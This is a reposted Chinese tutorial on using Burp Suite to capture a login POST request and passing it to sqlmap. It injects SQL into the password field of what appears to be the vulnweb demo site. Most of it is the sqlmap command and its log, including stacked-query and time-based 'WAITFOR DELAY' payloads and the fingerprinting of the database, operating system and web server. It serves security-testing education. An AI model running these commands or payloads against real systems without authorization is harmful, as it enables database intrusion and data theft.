码迷,mamicode.com
首页 > 数据库 > 详细

使用Burpsuite辅助Sqlmap进行POST注入测试

时间:2015-04-24 20:42:36      阅读:381      评论:0      收藏:0      [点我收藏+]

标签:

原文地址:http://www.freebuf.com/tools/2311.html

我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。

这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。

1. 浏览器打开目标地址 http://testasp.vulnweb.com/Login.asp
2. 配置burp代理(127.0.0.1:8080)以拦截请求
3. 点击login表单的submit按钮
4. 如下图,这时候Burp会拦截到了我们的登录POST请求

技术分享

5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
6. 运行sqlmap并使用如下命令:./sqlmap.py -r search-test.txt -p tfUPass,这里参数 -r 是让sqlmap加载我们的post请求rsearch-test.txt,而-p 大家应该比较熟悉,指定注入用的参数。

./sqlmap.py -r search-test.txt -p tfUPass

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from search-test.txt
[13:26:52] [WARNING] the testable parameter tfUPass you provided is not into the GET
[13:26:52] [WARNING] the testable parameter tfUPass you provided is not into the Cookie
[13:26:52] [INFO] using /home/testuser/sqlmap/output/testasp.vulnweb.com/session as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter tfUName but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter tfUPass might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter tfUPass
[13:26:55] [INFO] testing AND boolean-based blind - WHERE or HAVING clause
[13:27:02] [INFO] testing MySQL >= 5.0 AND error-based - WHERE or HAVING clause
[13:27:05] [INFO] testing PostgreSQL AND error-based - WHERE or HAVING clause
[13:27:07] [INFO] testing Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
[13:27:10] [INFO] testing Oracle AND error-based - WHERE or HAVING clause (XMLType)
[13:27:12] [INFO] testing MySQL > 5.0.11 stacked queries
[13:27:14] [INFO] testing PostgreSQL > 8.1 stacked queries
[13:27:17] [INFO] testing Microsoft SQL Server/Sybase stacked queries
[13:27:30] [INFO] POST parameter tfUPass is Microsoft SQL Server/Sybase stacked queries injectable
[13:27:30] [INFO] testing MySQL > 5.0.11 AND time-based blind
[13:27:31] [INFO] testing PostgreSQL > 8.1 AND time-based blind
[13:27:31] [INFO] testing Microsoft SQL Server/Sybase time-based blind
[13:27:42] [INFO] POST parameter tfUPass is Microsoft SQL Server/Sybase time-based blind injectable
[13:27:42] [INFO] testing MySQL UNION query (NULL) - 1 to 10 columns
[13:27:48] [INFO] testing Generic UNION query (NULL) - 1 to 10 columns
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application

>
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter tfUPass is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tfUName=test&tfUPass=test; WAITFOR DELAY 0:0:5;-- AND mPfC=mPfC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tfUName=test&tfUPass=test WAITFOR DELAY 0:0:5-- AND wpkc=wpkc
---

[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under /home/testuser/sqlmap/output/testasp.vulnweb.com

[*] shutting down at: 13:28:28

使用Burpsuite辅助Sqlmap进行POST注入测试

标签:

原文地址:http://www.cnblogs.com/LoveJulin/p/4454155.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!